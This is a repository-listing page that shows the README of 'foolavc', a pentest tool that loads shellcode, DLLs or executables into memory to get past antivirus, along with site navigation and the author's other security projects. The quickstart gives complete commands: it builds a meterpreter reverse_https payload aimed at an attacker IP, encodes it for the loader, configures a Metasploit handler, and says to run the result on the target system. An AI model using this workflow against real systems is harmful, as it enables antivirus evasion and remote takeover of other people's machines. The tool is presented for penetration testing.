Top Rating
- Top Contributors
  Discover the Top Open Source contributors by country or by language
- Interviews
  Discover real stories from Open Source developers
Discover

Discover your Favorite Language
Discover the top trending repositories and projects on Github. Explore the latest trends in your preferred languages.

Clojure

Scala

Zig

C

Haskell

Kotlin

Elixir

Ruby

More Languages
Awesome

Awesome repositories
Discover the most awesome repositories and projects of your favorite languages. Inspired by the Awesome-* lists trend in GitHub.

Elixir

Objective-C

Python

C#

Shell

Zig

Elm

C++

More Languages
By Country

Rankings by Country
Discover the community of talented open source contributors in each country.

🇲🇨 Monaco

🇨🇺 Cuba

🇸🇾 Syria

🇺🇸 United States

🇵🇾 Paraguay

🇲🇶 Martinique

🇮🇪 Ireland

🇨🇮 Côte d'Ivoire

All Countries Compare Countries

hvqzao/foolavc

Stars
110
Rank 309,892 (Top 7 %)
Language
C
License
MIT License
Created about 8 years ago
Updated almost 3 years ago

hvqzao/foolavc

hvqzao

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

foolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV

foolavc

This project is foolav continuation.

Original foolav was offered only as x86 executable, used single encoding for externally kept payload file. Once foolav is executed, payload is loaded into memory and executed as a shellcode in separate thread.

foolavc on the other hand supports both x86 and x86_64 architectures, allows use of both internal (built-in) or external payloads. Those can be interpreted in one of three ways: shellcode, DLL and EXEcutable.

Quickstart

cd foolavc
# create meterpreter executable
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=__ATTACKER_IP__ LPORT=8443 -f exe -o met64.exe
# encode it to met64.me
python m-encode.py met64.exe
# foolavc.exe acts as a loader, must have same name as .me file created earlier
cp x64/Release/foolavc.exe met64.exe

# create .rc script for metasploit
echo >msf.rc <<EOF
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LPORT 8443
set LHOST 0.0.0.0
set ReverseListenerBindAddress 0.0.0.0
set AutoRunScript migrate -f
show options
run -j
EOF
# start metasploit console with above script
msfconsole -qL -r msf.rc

# now copy both met64.exe and met64.me to the target system and execute met64.exe (foolavc binary)
# meterpreter session should spawn

Functionality

Once started binary checks for content of xl variable (payload.h). If set, it will be loaded into memory as DLL. Same thing happens for xe variable (loaded and executed in memory as PE executable file). xf variable, if set, will be executed as shellcode. In order to generate payload, x-encode.py script is provided.

External payloads should be stored in files in the same directory as executable. Those should be encoded using m-encode.py scipt. .ml is threated as DLL, .me as EXE and .mf as shellcode. Executable checks its name and attempts to open file with same name and one of before mentioned extensions.

Hints

Remember to use consistent architecture between binary and used payloads.
Once first present payload is executed, program waits for an input and is terminated. pause is used to wait for an input. If needed, this can be commented out or just bypassed - i.e. echo | pause

License

This project uses MemoryModule library (MPL 2.0 Licensed)

foolav

Pentest tool for antivirus evasion and running arbitrary payload on target Wintel host

burp-wildcard

Burp extension intended to compact Burp extension tabs by hijacking them to own tab.

liffy

Local File Inclusion Exploitation Tool (mirror)

report-ng

Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.

burp-flow

Extension providing view with filtering capabilities for both complete and incomplete requests from all burp tools.

java-deserialize-webapp

Vulnerable webapp testbed

burp-token-rewrite

Burp extension for automated handling of CSRF tokens

x

Pentest environment scaffolding. Supporting role in Kali Linux.

ipport

Small subset of Bash and Python scripts which could be used for rapid network recon

burp-second-order

Extension for semi-automated search for second order issues in webapps

jgantt

jGantt plugin for Atlassian JIRA Kanban board

evadeav

AV evasion experiment (fail inspired by some blogpost)

sqli-testbed

SQL injection testbed designed for sqlmap practice (MySQL backend)

burp-negotiate

Kerberos / SPNEGO authentication for BurpSuite

burp-csrf-handling

CSRF tokens handling Burp extension

java-rmi

Example Java RMI client-server both with and without SSL support

ve

Created to provide fast provisioning - automated download, build and set up Python or Node.JS virtual environments.

http-flood-netty

Trival HTTP Flood implementation based on Java Netty Framework

ftcliserv

File Transfer Client-Server

endec

Tiny utility to encrypt and decrypt text data using aes-256-cbc algorithm.